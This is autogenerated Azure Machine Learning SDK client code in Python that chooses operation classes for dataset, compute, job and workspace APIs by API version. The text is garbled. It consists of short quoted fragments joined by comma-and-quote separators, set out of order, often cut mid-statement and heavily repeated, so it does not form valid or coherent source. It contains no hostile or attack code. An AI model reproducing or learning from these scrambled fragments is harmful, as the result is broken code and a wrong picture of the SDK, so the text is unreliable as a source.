super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version,", "not have operation group 'data_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self):", "= self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else:", ":class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import 
DataVersionsOperations", "depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'spans'\".format(api_version)) return", "'2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does", "from ..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "'v1.0': from ..runhistory.aio.operations import RunArtifactsOperations as OperationClass else: raise ValueError(\"API version {} does", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01':", "waiting time between two polls for LRO operations if no Retry-After header is", "@property def batch_job_deployment(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\"", "api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API version", ":class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations", "version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), 
Deserializer(self._models_dict(api_version)))", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API", "return models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API", "RunsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "* 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "'2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "* 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "== '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations 
as OperationClass else: raise ValueError(\"API version {}", "profile. :param credential: Credential needed for the client to connect to Azure. :type", "depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1')", "async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self, *exc_details): await self._client.__aexit__(*exc_details)", ":class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version", "= self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as OperationClass elif", "Azure clouds (Azure Stack, Azure Government, Azure China, etc.). 
By default, it uses", "group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on", "group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on", "def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version))", "# type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client =", "version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_call'\".format(api_version))", "== '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version {}", "'2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0',", "* v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations", "group 'dataset_controller_v2'\".format(api_version)) return 
OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends on", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version == '2022-05-01':", "subscription_id: The ID of the target subscription. :type subscription_id: str :param api_version: API", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "{} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "version available on public Azure. For production, you should stick to a particular", "..v2022_05_01 import models return models raise ValueError(\"API version {} is not available\".format(api_version)) @property", "have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance", "resources. This ready contains multiple API versions, to help you deal with all", "if missing in profile. 
:type api_version: str :param base_url: Service URL :type base_url:", "'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run':", "@property def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` *", "the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\"", "str, api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default,", "..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations", ":class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01': from", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version", "@property def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` *", "on the API version: * 2021-10-01: 
:class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version", "version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. :type", "depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview:", "import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version {} does", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'operations'\".format(api_version))", "version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version: *", "version {} does not have operation group 'jobs'\".format(api_version)) 
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "self._get_api_version('online_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version", "version {} does not have operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass else:", "== '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {}", "have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance", "..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models", "ValueError(\"API version {} does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "..v2022_02_01_preview import models 
return models elif api_version == '2022-05-01': from ..v2022_05_01 import models", "operation group 'model_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends", "data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version =", "from ..v2022_05_01.aio.operations import OnlineDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends on the API", "operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends", "depends on the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API version:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version:", "api_version: str :param base_url: Service URL :type base_url: str :param profile: A profile", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as 
OperationClass else: raise ValueError(\"API", "isinstance(v, type)} @classmethod def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: *", "_PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\" LATEST_PROFILE = ProfileDefinition({ _PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations':", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise", "== '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from", "v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise", "@property def run(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\"", "group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on", "Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>`", "the API version: * 1.5.0: 
:class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version ==", "from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not", "does not have operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import", "* 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version", "* 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections')", "@classmethod def _models_dict(cls, api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if", "ValueError(\"API version {} does not have operation group 
'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as OperationClass", "on the API version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>`", "version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass", "\"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeVersionsOperations as", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'model_containers'\".format(api_version))", "'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers':", "not have operation 
group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self):", "group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview':", "KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration", "ValueError(\"API version {} does not have operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "project root for # license information. 
# # Code generated by Microsoft (R)", "models return models elif api_version == '2021-10-01': from ..v2021_10_01 import models return models", "* 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers')", "..registry_discovery import models return models elif api_version == 'v1.0': from ..runhistory import models", "def environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API version:", "raise ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config,", "@property def spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\"", "does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` 
* 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version == '2021-10-01':", "does not have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "have operation group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_link_resources(self): \"\"\"Instance", "from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version =", "from ..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview:", 
"'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version:", "models raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends", "ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", ":class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations", "group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on", "credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id: The ID of the target subscription. 
:type subscription_id: str", "version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>`", "on the API version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>`", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: 
:class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version =", "2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>` \"\"\" api_version = self._get_api_version('online_deployments') if", "= self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif", "@property def datastores(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` *", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version", "* 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version ==", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else: raise ValueError(\"API version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends on the API version:", "..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == 
'2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations", "import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as", "operation group 'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends", "raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config,", ":class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version", "does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version))", "API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): 
